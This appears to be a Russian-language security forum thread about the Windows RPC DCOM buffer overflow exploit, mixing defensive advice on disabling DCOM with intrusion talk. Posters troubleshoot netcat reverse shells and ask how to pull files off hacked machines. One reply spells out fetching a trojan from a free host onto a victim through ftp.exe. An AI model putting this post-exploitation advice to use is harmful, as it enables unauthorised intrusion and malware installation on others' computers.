Поиск  Пользователи  Правила 
Закрыть
Логин:
Пароль:
Забыли свой пароль?
Войти
 
Страницы: 1 2 След.
RSS
Windows RPC DCOM Buffer Overflow Remote Exploit #4 win32 port
 
Обсуждение статьи Windows RPC DCOM Buffer Overflow Remote Exploit  #4 win32 port
 
<font face="Arial, Helvetica, sans-serif">А может кто знает где найти исходники этого эксплойта?</font>
 
Поищи на http://metasploit.com
 
Странно, но эксплоит не сработал под win2000 sp4, хотя хорошо сработал против server 2003. И еще... Попытка завалить сервер извне не сработала - каждый раз он писал connection refushed
 
Да нет эксплоит вроде рабочий, только вопрос!!!, кого они хотели этим похачить? Разве что юзера лапуха у которого *$ во все стороны торчат ;) Лечится это путем вызова стандартной утилиты win2000 dcomcnfg -> Свойства по умолчанию -> Запретить все нах (смело вырубай DCOM) и файрволл уже не нужен :) (DCOM у меня уже год как вырублен :) и Netbios без проблем работает). А по поводу файрволла Outpost вроде неплохой хотя я и его мальца похакал :) см. http://www.securitylab.ru/?ID=39231
 
P.S. Еще года два назад (www.securityfriday.com) было известно про то что через DCOM можно чужой комп хачить :)

http://www.securityfriday.com/ToolDownload/IEen/ieen_doc.html

http://www.securityfriday.com/ToolDownload/Remoxec/remoxec_doc.html

и еще куча подобного добра
 
Аааа, а вот и юдик объявился снова :)))
А насчёт файрволла - то, о чём ты раструбил на весь форум, словом "похакал" не назовёшь. К этому действию подходи больше слово "покакал". И смысл работы эксплоита, о котором здесь обсуждение, ты, милок, как обычно не понял :).
Малыш иди учись лучше, а не флуди в форумах :).
 
А насчёт всех этих ссылок - это, милок, не уязвимости, а просто утилиты для работы с DCOM (нестандартные, согласен). Собственно там везде написано что ты должен знать логин и пароль на удалённой машине, чтобы например из памяти IE читать данные, передаваемые через SSL соединение (чем занимается, собственно, старый ieen). Так что к этому случаю твои примеры не относятся.
 
да фигня это, дком все закрыли давно (у кого есть что прятать, а те кто не закрыл - че у них искать?), а они развели шуму.... хех... лажа
 
Цитата
JurX пишет:
да фигня это, дком все закрыли давно (у кого есть что прятать, а те кто не закрыл - че у них искать?), а они развели шуму.... хех... лажа

подскажите плиз, как закрыть этот DCOM? [IMG]http://www.securitylab.ru/forum/smileys/smiley9.gif[/IMG] буду очень признателен, спасибо.
 
Кстати, криво под этим шелом отрабатывает net user с опицей ручного ввода пароля т.е. net user vasya *

Не дает вписать пароль.
 
Да и net use то же не цепляет указанные ресурсы...
 
Net Use не цепляет, с паролем всё ок. Тебе дампер залить надо? :)
 
Для компьютеров которые имеют два ип адреса NetCat 1.1 для виндов пишит следушее >
с:\nc.exe -vvv *.*.*.2 4444
*.*.*.2: inverse host lookup failed: h_errno 11004: NO_DATA
(UNKNOWN)
[*.*.*.2] 4444 (?): connection refused
sent 0, rcvd 0: NOTSOCK
Как получить наманый шелл?
И ещё как через cmd создать пользавателя с правами администратара, т.к net user создаёт только с правами пользавотеля
 
Блин че за лажа..
2 Elch Блин по моему я про это и писал, не так-ли?
 
Интересный exploit. Может кто подскажет дополнительные возможность которые дает использование данного Бага Windows. Это доступ ко всем дискам (от папок до файлов). Остаются вопросы
- можно ли обнаружить вторжение (логи c включением регистрации пользователей для Windows не отображают никаких подозрительных событий)?
- неразбериха в русской кодировке?
- возможно ли использования сетевых ресурсов других компьютеров, для того, чтобы перегнать интересующие данные со взломанного (какие тут могут быть методы)?
- Запрет разрешения DCOM-а конечно метод фиксить проблему, но если он необходим, то как поступать?
 
Помогите, пожалуйста, разобраться.
Мне не удаётся получить reverse shell в эксплойте, который был опубликован
группой XFocus. При запуске эксплойта для адреса 127.0.0.1 Netcat выдаёт следующее:
C:\Documents and Settings\Administrator>\nc\nc -l -p 4444 -vv
listening on [any] 4444 ...
DNS fwd/rev mismatch: localhost != HOMECOMPUTER
connect to [127.0.0.1] from localhost [127.0.0.1] 3083
sent 0, rcvd 0
Нет никакого shell'a. Если посмотреть работу эксплойта из WinDbg, то видно что вызов
CreateProcessA проходит успешно (возвращаемый результат в eax =1). Но в списке процессов
cmd.exe нет. Затем вызов closesocket закрывает соединение с 4444 портом (которое вроде нужно для shell'a). В чём может быть ппроблема?
(Компилятор Visual Studio.NET, OC Windows XP 5.1.2600 English без SP).
 
Получил шеллл! Как залить файл на удаленную машину? Шрифт не читабельный получается у cmd. Как я могу скопировать со взломанной машины файлик, посредством команд и программ которые находятся на машине (взломанной, моей)? Что я могу дополнительно почитать?
 
Берешь закачиваешь трояна на хостинг типа h1.ru
а потом через шелл делаешь
ftp.exe
> connect blabla.h1.ru
> RETR trojan.exe
и так далее.

ftp.exe - это ftp клиент лежит в дире винды
 
Цитата
Любознательный пишет:
Интересный exploit. Может кто подскажет дополнительные возможность которые дает использование данного Бага Windows.

Вопросы:
1) Почему до сих пор нет фикса от Microsoft ?
Это же 100% Winnuke из той самой оперы конца 90-х ...
2) http://www.k-otik.net/exploits/08.07.oc192-dcom.c.php
/* Windows remote RPC DCOM exploit
* Coded by oc192
*
* Includes 2 universal targets, 1 for win2k, and 1 for winXP. This exploit uses
* ExitThread in its shellcode to prevent the RPC service from crashing upon
* successful exploitation. It also has several other options including definable
* bindshell and attack ports.
*
* Features:
*
* -d destination host to attack.
*
* -p for port selection as exploit works on ports other than 135(139,445,539 etc)
*
* -r for using a custom return address.
*
* -t to select target type (Offset) , this includes universal offsets for -
*    win2k and winXP (Regardless of service pack)
*
* -l to select bindshell port on remote machine (Default: 666)
*
* - Shellcode has been modified to call ExitThread, rather than ExitProcess, thus
*   preventing crash of RPC service on remote machine.
*
*   This is provided as proof-of-concept code only for educational
*   purposes and testing by authorized individuals with permission to
*   do so.
*/

Только что собрал его под RH v7.3 обычным gcc.
Мыслю - cygwin'ом под win32 тоже скомпилируется.
И shell там поправили ... [IMG]http://www.securitylab.ru/forum/smileys/smiley5.gif[/IMG]
Правда - ещё не тестировал - только что закончил патчить через WindowsUpdate новый цомпутер ...
Сейчас попробую потренироваться ...
Страницы: 1 2 След.
Читают тему (гостей: 2)